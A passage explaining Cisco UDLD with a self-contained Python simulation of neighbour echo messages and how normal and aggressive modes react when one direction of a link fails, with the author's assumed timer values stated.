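As an added example (not Cisco code and not from the post), here is a simplified Python model of the exchange described above: each port periodically sends a PDU carrying its own device/port ID and an "echo" of every neighbour it currently hears, and a port that stops appearing in its neighbour's echo knows its transmit direction is not arriving. The device and port names are the ones from the show udld output; the hold time of three message intervals and the single timeout window before err-disable in aggressive mode are my assumptions that stand in for the real timers.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass(frozen=True)
class UdldPdu:
    device_id: str
    port_id: str
    echo: frozenset          # {(device_id, port_id), ...} the sender has heard


@dataclass
class UdldPort:
    device_id: str
    port_id: str
    aggressive: bool = False
    message_interval: int = 15     # seconds between hellos (15 in the post's output)
    timeout_interval: int = 5      # aggressive mode: time to re-establish before err-disable
    state: str = "undetermined"    # undetermined | bidirectional | unidirectional | errdisabled
    last_heard: dict = field(default_factory=dict)   # neighbour -> time last heard
    first_heard: dict = field(default_factory=dict)  # neighbour -> time first heard
    next_hello: int = 0
    deadline: Optional[int] = None

    @property
    def hold_time(self):
        # Assumption: a neighbour entry expires after three missed hellos.
        return 3 * self.message_interval

    def hello(self, now):
        """PDU to transmit at `now`, or None (err-disabled ports stay silent)."""
        if self.state == "errdisabled" or now < self.next_hello:
            return None
        self.next_hello = now + self.message_interval
        return UdldPdu(self.device_id, self.port_id, frozenset(self.last_heard))

    def receive(self, pdu, now):
        if self.state == "errdisabled":
            return
        me = (self.device_id, self.port_id)
        peer = (pdu.device_id, pdu.port_id)
        self.first_heard.setdefault(peer, now)
        self.last_heard[peer] = now
        if me in pdu.echo:
            self.state, self.deadline = "bidirectional", None
        elif now - self.first_heard[peer] >= self.hold_time:
            # The neighbour has had long enough to hear us and still does not echo
            # us: our transmit path is broken or lands on another port.
            self.state = "errdisabled" if self.aggressive else "unidirectional"

    def tick(self, now):
        """Age out silent neighbours and apply the mode-specific reaction."""
        if self.state == "errdisabled":
            return
        silent = [p for p, t in self.last_heard.items() if now - t > self.hold_time]
        for peer in silent:
            del self.last_heard[peer]
        if silent and self.state == "bidirectional":
            if self.aggressive:
                self.state, self.deadline = "unidirectional", now + self.timeout_interval
            else:
                self.state = "undetermined"     # normal mode: the port stays up
        if (self.aggressive and self.deadline is not None
                and now >= self.deadline and not self.last_heard):
            self.state = "errdisabled"


@dataclass
class Link:
    a: UdldPort
    b: UdldPort
    a_to_b: bool = True      # set False to break one direction (one fiber strand)
    b_to_a: bool = True

    def run(self, start, end):
        """Advance the model one second at a time; returns both port states."""
        for now in range(start, end):
            for src, dst, up in ((self.a, self.b, self.a_to_b), (self.b, self.a, self.b_to_a)):
                pdu = src.hello(now)
                if pdu is not None and up:
                    dst.receive(pdu, now)
            self.a.tick(now)
            self.b.tick(now)
        return self.a.state, self.b.state


def simulate(aggressive, fail_at=60, until=200):
    """Healthy link first, then the B->A strand fails at `fail_at`."""
    link = Link(UdldPort("CAT1042NJ69", "Fa0/7", aggressive),
                UdldPort("CAT0746Z1WN", "Fa0/16", aggressive))
    link.run(0, fail_at)
    link.b_to_a = False
    return link.run(fail_at, until)


if __name__ == "__main__":
    print("normal     :", simulate(aggressive=False))
    print("aggressive :", simulate(aggressive=True))
```

In normal mode the side that lost its neighbour only goes back to undetermined and keeps transmitting, while the other side learns it is no longer echoed; in aggressive mode both ends end up err-disabled, which is the difference the post describes.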